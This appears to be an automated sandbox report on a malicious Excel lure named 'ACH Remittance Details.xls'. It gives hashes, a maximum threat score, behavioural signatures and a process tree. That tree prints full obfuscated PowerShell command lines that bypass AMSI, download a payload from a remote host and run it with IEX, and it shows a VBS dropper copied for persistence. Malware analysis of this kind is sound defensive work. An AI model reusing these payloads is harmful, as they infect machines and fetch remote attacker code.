Analysis
-
max time kernel
21s -
max time network
130s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-01-2021 18:23
General
-
Target
ACH Remittance Details.xls
-
Size
35KB
-
MD5
b3931a02644f28eaee7711d36333eece
-
SHA1
72e0ab0c9b992f94db5ae45022df57f1522b9895
-
SHA256
d36d950e9c94564bcb37f058d4ba3636281a273fd59d7eac0f3dc8fa215b5590
-
SHA512
5202adec9629fc94eaa70d2e6d62212a9ebde57e9d7e89709f33efd4fd54ab8f44c699fb9c4553b8b640273305ce73a0aece8a4935fef9c67c0d4c60ffd4da63
Score
10/10
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 2 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH Remittance Details.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gh47gh7='92%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%02%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%82%37%37%56%36%F6%27%07%D2%47%27%16%47%37%02%B3%85%06%54%06%94%C7%72%92%72%72%37%26%67%E2%46%16%07%56%47%F6%E6%C5%72%72%B2%14%45%14%44%05%05%14%A3%67%E6%56%42%C2%72%72%37%26%67%E2%47%E6%56%96%C6%34%02%46%56%47%36%56%47%F6%27%05%F2%23%76%E6%96%B6%F2%D6%F6%36%E2%37%27%56%76%16%E6%16%D6%97%47%27%56%07%F6%27%07%16%D6%16%26%16%C6%16%F2%F2%A3%07%47%47%86%72%72%82%56%72%B2%72%C6%96%72%B2%72%64%72%B2%72%46%72%B2%72%16%F6%72%B2%72%C6%E6%72%B2%72%77%F6%72%B2%72%44%E2%72%B2%72%92%47%E6%56%72%B2%72%96%C6%72%B2%72%34%72%B2%72%26%56%72%B2%72%75%72%B2%72%E2%47%72%B2%72%56%E4%72%02%B2%72%02%47%36%72%B2%72%56%A6%72%B2%72%26%F4%72%B2%72%D2%77%72%B2%72%56%E4%82%72';$text = $gh47gh7.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\notepad.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-PSReadlineOption -HistorySaveStyle SaveNothing;$lFeLwjZnnuqoqqmcWTtn='64%6F%20%7B%24%70%69%6E%67%20%3D%20%74%65%73%74%2D%63%6F%6E%6E%65%63%74%69%6F%6E%20%2D%63%6F%6D%70%20%67%6F%6F%67%6C%65%2E%63%6F%6D%20%2D%63%6F%75%6E%74%20%31%20%2D%51%75%69%65%74%7D%20%75%6E%74%69%6C%20%28%24%70%69%6E%67%29%3B%24%74%35%36%66%67%20%3D%20%5B%45%6E%75%6D%5D%3A%3A%54%6F%4F%62%6A%65%63%74%28%5B%53%79%73%74%65%6D%2E%4E%65%74%2E%53%65%63%75%72%69%74%79%50%72%6F%74%6F%63%6F%6C%54%79%70%65%5D%2C%20%33%30%37%32%29%3B%5B%53%79%73%74%65%6D%2E%4E%65%74%2E%53%65%72%76%69%63%65%50%6F%69%6E%74%4D%61%6E%61%67%65%72%5D%3A%3A%53%65%63%75%72%69%74%79%50%72%6F%74%6F%63%6F%6C%20%3D%20%24%74%35%36%66%67%3B%5B%52%65%66%5D%2E%41%73%73%65%6D%62%6C%79%2E%47%65%74%54%79%70%65%28%27%53%79%27%2B%27%73%74%65%6D%2E%27%2B%27%4D%61%6E%61%27%2B%27%67%65%6D%27%2B%27%65%6E%74%27%2B%27%2E%41%75%74%6F%6D%27%2B%27%61%74%69%6F%27%2B%27%6E%2E%41%27%2B%27%6D%27%2B%27%73%69%27%2B%27%55%74%69%6C%73%27%29%2E%47%65%74%46%69%65%6C%64%28%27%61%27%2B%27%6D%73%27%2B%27%69%49%27%2B%27%6E%69%74%46%61%27%2B%27%69%6C%65%64%27%2C%27%4E%6F%6E%40%40%40%27%2E%72%65%70%6C%61%63%65%28%27%40%40%40%27%2C%27%50%75%62%27%29%2B%27%6C%69%63%2C%53%27%2B%27%74%61%74%69%63%27%29%2E%53%65%74%56%61%6C%75%65%28%24%6E%75%6C%6C%2C%24%74%72%75%65%29%3B%24%74%74%79%3D%27%28%4E%65%77%2D%27%2B%27%4F%62%6A%65%27%2B%27%63%74%20%4E%65%27%2B%27%74%2E%57%65%27%2B%27%62%43%6C%69%27%2B%27%65%6E%74%29%27%7C%49%60%45%60%58%3B%5B%76%6F%69%64%5D%20%5B%53%79%73%74%65%6D%2E%52%65%66%6C%65%63%74%69%6F%6E%2E%41%73%73%65%6D%62%6C%79%5D%3A%3A%4C%6F%61%64%57%69%74%68%50%61%72%74%69%61%6C%4E%61%6D%65%28%27%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%27%29%3B%24%6D%76%3D%20%5B%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%2E%49%6E%74%65%72%61%63%74%69%6F%6E%5D%3A%3A%43%61%6C%6C%42%79%6E%61%6D%65%28%24%74%74%79%2C%27%44%6F%77%6E%6C%6F%61%64%53%74%72%69%6E%67%27%2C%5B%4D%69%63%72%6F%73%6F%66%74%2E%56%69%73%75%61%6C%42%61%73%69%63%2E%43%61%6C%6C%54%79%70%65%5D%3A%3A%4D%65%74%68%6F%64%2C%27%68%74%74%70%73%3A%2F%2F%61%6C%61%62%61%6D%61%70%72%6F%70%65%72%74%79%6D%61%6E%61%67%65%72%73%2E%63%6F%6D%2F%6B%69%6E%67%2F%66%6F%6C%64%65%72%2F%41%74%74%61%63%6B%2E%6A%70%67%27%29%3B%24%72%37%38%66%64%30%30%30%73%64%3D%20%24%6D%76%20%2D%73%70%6C%69%74%20%27%25%27%20%7C%46%6F%72%45%61%63%68%2D%4F%62%6A%65%63%74%20%7B%5B%63%68%61%72%5D%5B%62%79%74%65%5D%22%30%78%24%5F%22%7D%3B%24%79%35%6A%68%36%32%64%66%30%3D%20%24%72%37%38%66%64%30%30%30%73%64%20%2D%6A%6F%69%6E%20%27%27%7C%49%60%45%60%58';$DFG45DFG0=$lFeLwjZnnuqoqqmcWTtn.Split('%') | forEach {[char]([Convert]::toint16($_,16))};$DFG45DFG0 -join ''|& (-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}))4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Roaming\notepad.vbs" "C:\Users\Admin\AppData\Local" /Y4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
f6e7c3250025e07834a97fa50efdb12c
SHA126a6432727eaee088454bf8d3eb5f44a6dccfe8a
SHA256ff1e720e410ddf42092c2ca030b5e8f3d1ffb1435c126e0ddae5a330b1d4c20a
SHA51201bbd54911e6798b68265c1b121b71f4119c4ab92bdd65b44854295bd7ea0399ff35519231604f32e09048f47eaf075e528d555786745cf8c3670a81519df56b
-
C:\Users\Admin\AppData\Roaming\notepad.vbsMD5
7c2461575cefe582992751922a989015
SHA19fbe120ebe0a97597498ccb9b73754b9f02933e8
SHA256f3ea24d2f5b3b3e13a9d7c4a57e919c83227a48e52e02ea0765e429552a3f7be
SHA51243c3fc5a12ddf32ccef5cb7e0ccd9dedb913baa0f6247d1a6b7758750278f90a42fe2b81a87d75453f915cbb71bccf5a07599c57df54a72fde14b155b0dceb8c
-
memory/2152-14-0x0000000000000000-mapping.dmp
-
memory/2208-26-0x000001EE17F96000-0x000001EE17F98000-memory.dmpFilesize
8KB
-
memory/2208-25-0x000001EE19900000-0x000001EE19901000-memory.dmpFilesize
4KB
-
memory/2208-24-0x000001EE17F93000-0x000001EE17F95000-memory.dmpFilesize
8KB
-
memory/2208-23-0x000001EE17F90000-0x000001EE17F92000-memory.dmpFilesize
8KB
-
memory/2208-19-0x00007FFF62E50000-0x00007FFF6383C000-memory.dmpFilesize
9.9MB
-
memory/2208-16-0x0000000000000000-mapping.dmp
-
memory/2736-12-0x0000021EBA143000-0x0000021EBA145000-memory.dmpFilesize
8KB
-
memory/2736-13-0x0000021EBA146000-0x0000021EBA148000-memory.dmpFilesize
8KB
-
memory/2736-11-0x0000021EBA140000-0x0000021EBA142000-memory.dmpFilesize
8KB
-
memory/2736-10-0x0000021EBA440000-0x0000021EBA441000-memory.dmpFilesize
4KB
-
memory/2736-9-0x0000021EBA290000-0x0000021EBA291000-memory.dmpFilesize
4KB
-
memory/2736-8-0x00007FFF62E50000-0x00007FFF6383C000-memory.dmpFilesize
9.9MB
-
memory/2736-7-0x0000000000000000-mapping.dmp
-
memory/3756-17-0x0000000000000000-mapping.dmp
-
memory/3884-2-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB
-
memory/3884-6-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB
-
memory/3884-5-0x00007FFF6D2A0000-0x00007FFF6D8D7000-memory.dmpFilesize
6.2MB
-
memory/3884-4-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB
-
memory/3884-3-0x00007FFF49320000-0x00007FFF49330000-memory.dmpFilesize
64KB